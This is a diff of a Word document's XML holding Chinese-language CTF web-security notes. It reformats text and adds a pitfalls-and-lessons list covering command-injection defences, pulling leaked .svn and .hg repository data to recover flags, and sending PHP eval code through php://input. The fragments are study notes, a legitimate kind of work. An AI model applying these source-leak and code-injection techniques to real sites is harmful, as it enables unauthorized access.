-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>不拼字符串：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14630,17 +14261,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**白名单</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>白名单：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14658,17 +14281,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**不用 shell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>不用 shell：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14708,17 +14323,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**禁用函数</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>禁用函数：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14736,17 +14343,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**最小权限</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">**：web 用户不能读 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">最小权限：web 用户不能读 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14771,17 +14370,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**open_basedir</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**：限制可访问目录</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>open_basedir：限制可访问目录</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14922,17 +14513,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>⚠️ `escapeshellarg` 也不是万能的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> —— Windows 上有已知绕过（</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">⚠️ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>escapeshellarg</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 也不是万能的 —— Windows 上有已知绕过（</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15365,7 +14963,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>1</w:t>
@@ -15448,7 +15045,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>2</w:t>
@@ -15493,7 +15089,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>3</w:t>
@@ -15546,7 +15141,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>4</w:t>
@@ -15636,7 +15230,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>5</w:t>
@@ -15726,7 +15319,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>6</w:t>
@@ -15768,22 +15360,280 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
+        <w:t xml:space="preserve">教训：是我 grep 正则 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>^[+-][^+-]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 排除了 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>++</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 前缀，不是 git 的问题</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：凭"index 有 3 个条目"判成 Index 题</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>教训：HEAD tree 也是 3 个，差集为空 —— 判据要算差集</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>curl .svn/wc.db</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 报二进制警告</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">教训：二进制文件必须 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>-o</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">坑：只看 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>NODES</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 漏掉被删文件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">教训：要看 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>PRISTINE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 的 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>refcount = 0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.hg/store/data/flag_xxx.txt.i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> → 404</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
         <w:t>教训：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>是我 grep 正则 `^[+-][^+-]` 排除了 `++` 前缀</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>，不是 git 的问题</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 要转义成 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>__</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15793,10 +15643,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>7</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>11</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15808,7 +15657,15 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>坑：凭"index 有 3 个条目"判成 Index 题</w:t>
+        <w:t xml:space="preserve">坑：revlog 解压报 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>incomplete stream</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15820,22 +15677,280 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
+        <w:t xml:space="preserve">教训：首字节 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>'u'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 原文，不是 zlib</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>rip-hg.pl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 报 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>cannot find hg</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">教训：要先 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>apt install mercurial</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>13</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ghproxy.net</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 502</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">教训：换 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>gh-proxy.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>14</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：HackBar 里 body 被 URL 编码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">教训：看到 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>%3C%3Fphp...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 编码了；</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>php://input</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 不解码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>15</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>坑：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>-G</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 把 body 变成 URL 参数</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
         <w:t>教训：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>HEAD tree 也是 3 个，差集为空</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> —— 判据要算差集</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>php://input</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 就没 body 了</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15845,10 +15960,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>8</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15868,14 +15982,14 @@
           <w:color w:val="C7254E"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>curl .svn/wc.db</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 报二进制警告</w:t>
+        <w:t>eval</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 里漏分号 → 空白</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15887,15 +16001,236 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
+        <w:t xml:space="preserve">教训：PHP 语句要 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">（除非后面跟 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>?&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
